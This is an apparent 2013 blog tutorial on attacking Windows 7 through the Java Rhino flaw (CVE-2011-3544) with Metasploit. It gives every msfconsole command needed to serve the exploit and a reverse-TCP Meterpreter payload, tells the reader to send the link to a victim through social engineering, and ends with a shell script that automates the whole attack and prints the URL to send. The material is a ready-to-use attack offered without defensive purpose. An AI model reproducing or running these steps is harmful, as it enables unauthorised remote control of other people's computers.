Sunday, January 13, 2013

Browser exploit series (1) JAVA Rhino exploit




Today we are going to pwn Windows 7 with a Java exploit, the Java Rhino exploit (CVE-2011-3544). Here I quote the Armitage description of the Metasploit module: "This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary code outside of the sandbox." The vulnerable versions are Java 7 before Update 1 and Java 6 up to Update 27. Because the bug is in the Java plugin and not in the browser, it works with any browser that loads a vulnerable plugin: Firefox, Safari, Internet Explorer, Google Chrome, etc. You can check which build a machine runs with #java -version#.
First of all, update Metasploit with the command #msfupdate# (on BackTrack 5 this pulls the latest modules from the Metasploit SVN repository), to make sure the module above is in your local module database. Then run:

#msfconsole

Then type this command:

#use exploit/multi/browser/java_rhino

Then set the payload, a Java Meterpreter that connects back to our machine:

#set payload java/meterpreter/reverse_tcp




At this point, type these commands. The first one sets the address on which the malicious web server listens:

#set srvhost 192.168.1.6

In this case 192.168.1.6 is my internal IP; replace it with your own. If you don't know your IP address, open a terminal and type #ifconfig#. The next command sets the port of the server, usually 80 so the link looks like an ordinary website (binding a port below 1024 requires root, which is the default user on BackTrack):

#set srvport 80

The next commands set the URI path of the exploit page and the listener (LHOST/LPORT) that the payload will connect back to:

#set uripath java_rhino

#set lhost 192.168.1.6

#set lport 443




Notice that srvhost and lhost are the same address here: the first is where the exploit page is served from, the second is where the Meterpreter connects back to. Finally, type this command and wait for a connection:


#exploit








As you can see, a link has been generated for you: http://192.168.1.6:80/java_rhino. Copy it and send it to your victim. Once you succeed in social engineering the victim into opening the link in a browser with a vulnerable Java plugin, the module serves the applet, the payload connects back to port 443, and you get a Java Meterpreter session (list it with #sessions -l#).
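The whole setup above can be scripted instead of typed line by line. The script below is an added example, not part of the original post or of Metasploit itself: it reads the local IP the same way the post does (from ifconfig, or from ip where available), writes the msfconsole commands into a resource file, prints the URL to hand to the target, and starts msfconsole with that file. The interface selection, the file name java_rhino.rc and the root check are my assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): generate and launch a
# Metasploit resource script for exploit/multi/browser/java_rhino.
set -eu

# First non-loopback IPv4 address, i.e. the value the post reads off ifconfig.
# Prefers `ip` when present; falls back to the old "inet addr:" ifconfig format.
local_ip() {
    if command -v ip >/dev/null 2>&1; then
        ip -4 -o addr show scope global | awk '{print $4}' | cut -d/ -f1 | head -n1
    else
        ifconfig | awk '/inet / && !/127\.0\.0\.1/ { a=$2; sub("addr:","",a); print a; exit }'
    fi
}

# The msfconsole commands from the post, as a resource script.
# $1 = SRVHOST and LHOST, $2 = SRVPORT, $3 = LPORT, $4 = URIPATH
rhino_rc() {
    cat <<EOF
use exploit/multi/browser/java_rhino
set payload java/meterpreter/reverse_tcp
set SRVHOST $1
set SRVPORT $2
set URIPATH $4
set LHOST $1
set LPORT $3
exploit -j
EOF
}

# The link the module prints is simply http://SRVHOST:SRVPORT/URIPATH.
# $1 = host, $2 = port, $3 = uripath
payload_url() {
    printf 'http://%s:%s/%s\n' "$1" "$2" "$3"
}

main() {
    ip="${1:-$(local_ip)}"
    srvport=80
    lport=443
    uripath=java_rhino

    # Assumed check: a port below 1024 cannot be bound without root, so fail
    # here instead of letting the module fail after msfconsole has started.
    if [ "$srvport" -lt 1024 ] && [ "$(id -u)" -ne 0 ]; then
        echo "SRVPORT $srvport needs root; run as root or choose a port >= 1024" >&2
        exit 1
    fi

    rhino_rc "$ip" "$srvport" "$lport" "$uripath" > java_rhino.rc
    echo "Resource script written to java_rhino.rc"
    echo "Send the target: $(payload_url "$ip" "$srvport" "$uripath")"
    # -q skips the banner, -r runs the commands in the resource file.
    msfconsole -q -r java_rhino.rc
}

# Only launch msfconsole when it is installed; otherwise the functions above
# can still be sourced and reused.
if command -v msfconsole >/dev/null 2>&1; then
    main "$@"
else
    echo "msfconsole not found; nothing launched" >&2
fi
```

Run it as root on the attacker box (optionally passing the IP as the first argument); `exploit -j` keeps the server in the background so the console stays usable for `sessions -l` once a target connects.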




